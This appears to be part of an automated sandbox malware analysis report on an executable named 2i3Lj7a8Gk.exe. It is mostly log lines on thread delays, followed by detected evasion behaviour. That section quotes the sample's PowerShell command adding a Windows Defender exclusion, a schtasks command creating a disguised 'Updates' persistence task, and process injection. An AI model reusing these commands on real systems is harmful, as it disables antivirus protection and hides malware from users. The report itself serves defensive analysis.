                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595500
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595390
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595281
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595169
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595062
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594843
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594734
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594625
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594515
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8043Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1573Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeWindow / User API: threadDelayed 2893Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeWindow / User API: threadDelayed 6950Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeWindow / User API: threadDelayed 1396
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeWindow / User API: threadDelayed 8462
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 6304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7424Thread sleep count: 2893 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7424Thread sleep count: 6950 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599326s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598323s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597981s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597873s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595902s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595231s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -595000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -594890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -594671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exe TID: 7400Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep count: 31 > 30
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -28592453314249787s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7636Thread sleep count: 1396 > 30
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599885s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7636Thread sleep count: 8462 > 30
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598124s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -598015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597468s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -597031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596921s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596581s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596229s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -596109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595997s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595852s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595728s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595169s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -595062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -594953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -594843s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -594734s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -594625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe TID: 7628Thread sleep time: -594515s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599326Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598323Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597981Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597873Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597546Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595902Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595231Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599885
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599656
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599547
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598453
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598343
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598124
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598015
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597906
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597797
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597687
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597468
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597359
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597250
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597140
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597031
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596921
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596812
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596703
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596581
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596453
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596343
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596229
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595997
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595852
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595728
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595609
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595500
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595390
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595281
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595169
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595062
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594843
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594734
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594625
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 594515
                  Source: 2i3Lj7a8Gk.exe, 00000006.00000002.4141674106.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: lyNyKapwZJLKnn.exe, 0000000D.00000002.4141044809.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeCode function: 6_2_06CF9548 LdrInitializeThunk,6_2_06CF9548
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory written: C:\Users\user\Desktop\2i3Lj7a8Gk.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyNyKapwZJLKnn" /XML "C:\Users\user\AppData\Local\Temp\tmp760C.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess created: C:\Users\user\Desktop\2i3Lj7a8Gk.exe "C:\Users\user\Desktop\2i3Lj7a8Gk.exe"Jump to behavior
